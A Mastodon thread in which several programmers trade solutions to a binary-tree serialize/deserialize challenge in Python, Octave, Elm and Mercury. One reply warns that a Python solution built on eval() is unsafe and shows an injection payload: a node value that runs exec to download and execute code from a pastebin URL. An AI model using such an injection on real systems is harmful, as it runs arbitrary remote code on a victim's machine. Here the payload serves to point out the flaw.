Follow


Here's another freebie, I assume it is python specific because they start with a base of python code. But if it makes sense, try it in whatever language you like:

This problem was asked by Google.

Given the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.

For example, given the following Node class

class Node:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
The following test should pass:

node = Node('root', Node('left', Node('left.left')), Node('right'))
assert deserialize(serialize(node)).left.left.val == 'left.left'

Here's a python solution 

Need a better solution for deserialization than eval()

git.qoto.org/Absinthe/serializ

Show thread

Unsafe code behaviour 

@Absinthe Your implementation of serialize() can't handle nodes whose names contain quote marks. Ordinarily this would only cause it to output strings that deserialize() can't understand, but, since your implementation of deserialize() eval()s its argument, it's possible to execute arbitrary code on any machine attempting to deserialize(serialize()). For example:

node = Node("' + str(exec('import urllib.request; exec(urllib.request.urlopen(\\\'pastebin.com/raw/Tuh7jNbc\\\').read())')) + '")

deserialize(serialize(node));

Unsafe code behaviour 

@khird kind of figured there were good reasons not to use eval, but what is an appropriate alternative?

@Absinthe I have hardly any experience with Python but I think you ought to write your own parser that reports an error on input that can't represent an actual tree (this is what I did in my solution, anyway). The other issue is making sure you escape any special characters in Node.val so your parser doesn't treat them as control characters.


@billstclair @namark @khird

I think there should be a nice recursive way to deserialize it similar to the way it gets serialized. I am thinking some way to have a deserializer that returns a Node from a string, but I need to do something like Node(value from serialized string), deserialize(for the left node), deserialize(for the right node)) ...

I don't know how to partially consume the string to get the left node, and then take up where it left off for the right node. I was thinking maybe using an index but that would have to be similar to a C static variable. or globalized somehow so that it maintained state. I am missing a python paradigm somewhere. :)

@Absinthe @billstclair @khird
This one seems like a really broad problem, as opposed to a simple puzzle, unless the solution is some cute python specific trick, in which case eval doesn't sound that bad.

Otherwise, since there are no restriction on the serialized data, the simplest solution I think would be to split the tree into 2 data structures:

- associative array of fixed size ids and values,

- breadth first linearisation of the tree with the fixed size ids

and de/serialize that.

@namark @billstclair @khird Tree serialization seems to be one of those things that is generally easy to do with recursion. And so I did it. However, with the thoughts of deserialization, I figured I could serialize it to it's own deserialization command and run eval. Both pylint and the whole of the boaty mcBoatface crowd agree that eval is almost never the right answer for anything :) So I figure I would like to have a "parallel" deserialization, but somehow I have to be able to traverse something recursively while maintaining state. Or at least keep my place through multiple calls. :)

@Absinthe @namark @khird

It’s normal to pass done state to a recursive call, and return a modified state. I didn't understand what forms the leaf values could take in that example. If somebody explains it, I’ll do it on Elm.

@billstclair @namark @khird The leaf nodes would simply have a value, and left and right would be None

@Absinthe @billstclair @khird actually, thinking about it(instead of completely ignoring what you wrote before) can't the deserialize function accept an optional start point, and return the end point along with the node. Then you can feed the endpoint of the left child to the right child as a start.
If you have a cheap substring, it can replace the start parameter. Also the serializer can store the size of the left node, so that the right one doesn't have to wait for it.

@billstclair @namark @khird as it is the "value" was a string since it was indicative of where it was. So "root", "left" "left.left" and so forth. But left and right are Nodes as created by the Node class in the example

@Absinthe @namark @khird

OK. That lets me dispense with parsing strings into numbers and other atomic types. I'll just make the value of a node be empty or a string, and the right and left sub-nodes can each be empty or another node.

I'm assuming it's acyclic, since that simplifies the walker, as it won't have to detect loops, but allowing cyclic networks as well isn't that big an issue, though in a pure functional language, it requires nodes to be referenced by unique ID, which is an index into a table storing each node's value, right, and left. I may implement it that way from the start, just so I only need to add the loop detection, not change the representation.

This is going to be fun!
@Absinthe @khird @namark

I have the representation done, and serialization (as JSON). Breaking for lunch, and probably a nap; I didn't sleep enough last night.

It compiles, but I haven't run any of the code yet. The UI is still as comes with a new Ellie project.

https://ellie-app.com/6PmF9LHjL4va1

@Absinthe @billstclair @namark

I don't think you need any global variables.

Your input string looks something like Node('foo',None,Node('bar',None,None)) based on the ouput of your version of serialize(), right? So you can parse it recursively. The general algorithm could be something like:

1. Check that the string begins with 'Node('.

2. Find the first comma. Everything between 'Node(' until this point is self.val.

3. If the next four characters after the comma are 'None' self.left is None.

4. If self.left is not None, examine the string starting after the comma.
a. Set the nesting level to zero.
b. For every open-paren increment the nesting level by one.
c. For every close-paren decrement the nesting level by one.
d. When you find a comma AND the nesting level is zero, stop.

5. Recursively call deserialize() on everything between the comma you found in step 2 and the comma you found in step 4d. Save the answer as self.left.

6. If the next four characters after the comma are 'None' self.right is None.

7. If self.right is not None, examine the string starting after the comma.
a. Set the nesting level to zero.
b. For every open-paren increment the nesting level by one.
c. For every close-paren decrement the nesting level by one.
d. When you find a close-paren AND the nesting level is zero, stop.

8. Recursively call deserialize() on everything between the comma you found in step 4d and the close-paren you found in step 7d. Save the answer as self.right.

Octave solution 

function self = node(val, left = [], right = [])
self.val = val;
self.left = left;
self.right = right; end;

function escaped = escape_chars(raw)
escaped = regexprep(raw, '([\\\(\),])', '\\$1'); end;

function raw = unescape_chars(escaped)
i = 1;
while i < numel(escaped)
if escaped(i) == '\'
escaped = escaped([1:(i - 1) (i + 1):end]); end;
i++; end;
raw = escaped; end

function index = val_extent(string)
special_chars = strchr(string, '(,)');
if isempty(special_chars)
index = 0;
else
is_backslash = string == '\';
for i = special_chars
is_escaped = false;
for j = (i - 1):-1:1
if is_backslash(j)
is_escaped = ~is_escaped;
else
break; end; end;
if ~is_escaped
break; end; end;
index = i; end; end;

function string = serialize(tree)
if isempty(tree)
string = [];
elseif isempty(tree.left) && isempty(tree.right)
string = escape_chars(tree.val);
else
string = [escape_chars(tree.val) '(' serialize(tree.left) ',' serialize(tree.right) ')']; end; end

function [node, leftover] = deserialize(string)
next_special = val_extent(string);
if next_special == 0
node.val = unescape_chars(string);
node.left = [];
node.right = [];
leftover = [];
elseif string(next_special) == '('
node.val = unescape_chars(string(1:(next_special - 1)));
leftover = string((next_special + 1):end);
[node.left, leftover] = deserialize(leftover);
[node.right, leftover] = deserialize(leftover);
else
if next_special == 1
node = [];
else
node.val = unescape_chars(string(1:(next_special - 1)));
node.left = [];
node.right = []; end
if string(next_special) == ','
leftover = string((next_special + 1):end);
else
leftover = string((next_special + 2):end); end; end; end;

Better deserialize() 

function indices = control_chars(string)
special_chars = strchr(string, '(,)');
indices = [];
if ~isempty(special_chars)
is_backslash = string == '\';
for i = special_chars
is_escaped = false;
for j = (i - 1):-1:1
if is_backslash(j)
is_escaped = ~is_escaped;
else
break; end; end;
if ~is_escaped
indices = [indices i]; end; end; end; end;

function node = deserialize(string)
controls = control_chars(string);
if numel(controls) == 0
node.val = unescape_chars(string);
node.left = [];
node.right = [];
else
if string(controls(1)) ~= '('
error('Invalid control character at %d', controls(1)); end;
nested_level = 0;
top_controls = NaN(3, 1);
for i = controls
switch string(i)
case '('
if nested_level == 0
top_controls(1) = i; end;
nested_level++;
case ','
if nested_level == 1
if ~isnan(top_controls(2))
error('Encountered '','' at %d after finding two children', i); end;
top_controls(2) = i; end;
case ')'
if nested_level <= 1
if isnan(top_controls(2))
error('Encountered '')'' at %d before finding two children', i);
elseif i ~= numel(string)
error('Encountered final '')'' at %d before end of string', i); end;
top_controls(3) = i; end;
nested_level--; end; end;
if any(isnan(top_controls))
error('Incomplete tree description'); end;
node.val = unescape_chars(string(1:(top_controls(1) - 1)));
node.left = deserialize(string((top_controls(1) + 1):(top_controls(2) - 1)));
node.right = deserialize(string((top_controls(2) + 1):(end - 1))); end; end;

@Absinthe How about, one crazy function that works both ways!
git.sr.ht/~namark/mercury_stuf

Though, it goes haywire if input is invalid or if value contains anything in the form of "|number|", where number is less than depth of the tree. Probably has something to do with compiler complaining that code I wrote is impure and non-deterministic, and me just silencing it.
Also it only handles string values, cause I don't know how to write generic code yet.

#toyprogrammingchallenge #mercurylang

@namark

That doesn't cause a stack overflow anymore, but it still fails to parse, e.g. if you rename the "left.left" node to "0", "sometext|0", "sometext|0|moretext", etc.

Also this is a *weird* language.

@khird yes the problem with the separator still remains. I guess I need to "quote" the values somehow.

It's the weirdest language, and on top of that I'm not using it right.

@khird tried to fix those cases here
git.sr.ht/~namark/mercury_stuf
hopefully without introducing new problems?

But it doesn't look like a single function anymore, so no fun. Will maybe try to rectify that later.

@namark @Absinthe

Here’s a live, runnable Elm solution to the serialized tree problem. You can change the <textarea> labelled “Input serialized node JSON here”, and it will parse and serialize after each keystroke.

https://ellie-app.com/6PrNYFqhwhja1

#toyprogrammingchallenge #elmlang

import Json.Encode as JE exposing (Value) import Json.Decode as JD exposing (Decoder) {-| A simple two-way branching tree node with an optional string value. -} type Node = Node { value : Maybe String , left : Maybe Node , right : Maybe Node } {-| Serialization -} nodeToString : Int -> Node -> String nodeToString indent node = JE.encode indent <| encodeNode node {-| Deserialization -} stringToNode : String -> Result JD.Error Node stringToNode string = JD.decodeString nodeDecoder string --- Implementation encodeMaybe : (a -> Value) -> Maybe a -> Value encodeMaybe encoder maybeA = case maybeA of Nothing -> JE.null Just a -> encoder a encodeNode : Node -> Value encodeNode (Node { value, left, right }) = JE.object [ ("value", encodeMaybe JE.string value) , ("left", encodeMaybe encodeNode left) , ("right", encodeMaybe encodeNode right) ] nodeDecoder : Decoder Node nodeDecoder = JD.map3 (\value left right -> Node { value = value, left = left, right = right }) (JD.field "value" <| JD.nullable JD.string) (JD.field "left" <| JD.nullable (JD.lazy (\() -> nodeDecoder))) (JD.field "right" <| JD.nullable (JD.lazy (\() -> nodeDecoder)))

@billstclair @namark Oh, yeah, I know my values can't contain ',' characters. I may redo it with some other control or npc

@Absinthe @namark

Simpler-looking than my Elm code, but I don't really read Python, so I don't understand it. My Elm code serializes to JSON, so it will properly escape anything that needs that.

@billstclair @namark aiming for simple or elegant. Would be happy with "pythonical" :)

@Absinthe
Loosey-goosey perhaps? :D
I tried to break it with some weird input, but it just gobbles everything up, without second thoughts, even if it isn't technically a proper serialization string.

Maybe a bit hard to read, but with stuff that I'm putting out, I don't think I have the right to say that.

@namark "Loosey-Goosey" How so? I can certainly try to tighten it up some.

@Absinthe I tried giving it a value, in a place where it would expect a node, and it seems like it just assumes that to be a None node.
So something like
serialize(deserialize("a")), gives out None
"a,b" -> "a,None,None"
"a,b,c" -> "a,b,None,None,None"
Just being weirdly ok with things I thought should break it. Though arbitrary input wasn't a part of the problem, so that probably doesn't count.

Also aside from the commas in values, "None" as a value also seems to break things.

@namark yeah, I fixed the comma thing, made it into RS 0x1E. I guess I could change the 'None' to either actual None or another control character. But FWIW I think I may have to just leave it be, as close enough for government work :) I found some other people solve similar problems with # for the None value. I think I am ready to move on to the next problem. Got a new one today, seems like a real PITA.

@Absinthe sure, I'm just scrutinizing cause @khird scrutinized mine and I liked it. I'll leave it for now as well, but will have to come back to it eventually. Ultimate goal - de/serialize a binary tree of binary trees.

@namark @khird ultimately in a real serialization using a format like JSON or XML or something with a DOM and library to handle it. Then it can be used from something else as well. But these problems however, are meant to be quick enough to accomplish in a job interview. I thought of a different way to try also. I think I can create a geenrator and just use next() then maybe I can avoid the idx. But this seemed like a fun enough way to solve the problem.

What did you think of this weekend's problem? The "One to Nine" one?

The freebie today is pretty annoying too. Debating if I want to try to solve it or not yet.

@Absinthe @khird I've got no ideas other than a brute force solution so far. Will try to do that thing again where I barely write any code and make mercury go through all possible combinations for me... and probably overflow the stack.

@namark @khird sometimes bruter force is the right answer.

There is a quote by Herodotus "Force has no place where there is need of skill." However, I paraphrase it a little when I say "Brute force is only rarely a substitute for finesse"

@Absinthe @namark

My take on it is, "Man-hours cost more than CPU-hours." Say I figure out a more sophisticated algorithm that can save CPU time, but implementing it and debugging the extra complexity costs an hour of my time. It probably doesn't make sense to go that route unless it will save more than about fifty hours of compute time in the long run.

E.g. if on a typical dataset I can save a second per run by getting fancy, we would recoup my invested time after 180,000 executions of the program. If it's a report that gets run daily, that break-even point is about five hundred years in the future.

@khird @Absinthe
I would also pick readable code over optimal code most of the time, however if you are not the sole user, you'll have to divide that by the number of users, and then it can become a completely different story.

The ever illusive nature of software - to be copyable with practically no effort.

Sign in to participate in the conversation
Qoto Mastodon

QOTO: Question Others to Teach Ourselves
An inclusive, Academic Freedom, instance
All cultures welcome.
Hate speech and harassment strictly forbidden.